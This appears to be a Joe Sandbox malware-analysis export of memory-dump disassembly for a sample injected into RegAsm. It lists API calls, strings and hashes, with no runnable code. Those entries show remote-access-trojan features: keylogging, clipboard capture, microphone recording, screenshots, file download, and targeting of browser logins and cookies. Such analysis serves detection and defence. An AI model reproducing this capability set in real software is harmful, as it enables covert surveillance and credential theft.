                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                          APIs
                          Strings
                          • Cleared browsers logins and cookies., xrefs: 0040C130
                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                          • API String ID: 3472027048-1236744412
                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                          APIs
                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DisplayEnum$Devices$Monitors
                          • String ID:
                          • API String ID: 1432082543-0
                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                          APIs
                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQuerySleepValue
                          • String ID: 8SG$`.|$exepath
                          • API String ID: 4119054056-2072530549
                          • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                          • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                          • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                          • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                          APIs
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseHandleReadSize
                          • String ID:
                          • API String ID: 3642004256-0
                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                          APIs
                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                          • Sleep.KERNEL32(00000064), ref: 0040A638
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$ForegroundLength
                          • String ID: [ $ ]
                          • API String ID: 3309952895-93608704
                          • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                          • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                          APIs
                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleOpenProcess
                          • String ID:
                          • API String ID: 39102293-0
                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                          • String ID:
                          • API String ID: 2633735394-0
                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                          APIs
                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: MetricsSystem
                          • String ID:
                          • API String ID: 4116985748-0
                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                          APIs
                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                          • String ID:
                          • API String ID: 1761009282-0
                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                          APIs
                          • _free.LIBCMT ref: 1000655C
                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                          • String ID: *?$.
                          • API String ID: 2667617558-3972193922
                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                          APIs
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: [End of clipboard]$[Text copied to clipboard]
                          • API String ID: 1881088180-3686566968
                          • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                          • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                          APIs
                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ACP$OCP
                          • API String ID: 0-711371036
                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                          APIs
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                          • String ID: image/png
                          • API String ID: 1291196975-2966254431
                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                          APIs
                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                          Strings
                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: KeepAlive | Enabled | Timeout:
                          • API String ID: 481472006-1507639952
                          APIs
                          • Sleep.KERNEL32 ref: 0041667B
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadFileSleep
                          • String ID: !D@
                          • API String ID: 1931167962-604454484
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: : $Se.
                          • API String ID: 4218353326-4089948878
                          APIs
                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: | $%02i:%02i:%02i:%03i
                          • API String ID: 481472006-2430845779
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: alarm.wav$hYG
                          • API String ID: 1174141254-2782910960
                          APIs
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • CloseHandle.KERNEL32(?), ref: 0040B0EF
                          • UnhookWindowsHookEx.USER32 ref: 0040B102
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                          • String ID: Online Keylogger Stopped
                          • API String ID: 1623830855-1496645233
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          APIs
                          • waveInPrepareHeader.WINMM(00799000,00000020,?), ref: 00401849
                          • waveInAddBuffer.WINMM(00799000,00000020), ref: 0040185F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: wave$BufferHeaderPrepare
                          • String ID: XMG
                          • API String ID: 2315374483-813777761
                          APIs
                          • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocaleValid
                          • String ID: IsValidLocaleName$kKD
                          • API String ID: 1901932003-3269126172
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                          • API String ID: 1174141254-4188645398
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                          • API String ID: 1174141254-2800177040
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: AppData$\Opera Software\Opera Stable\
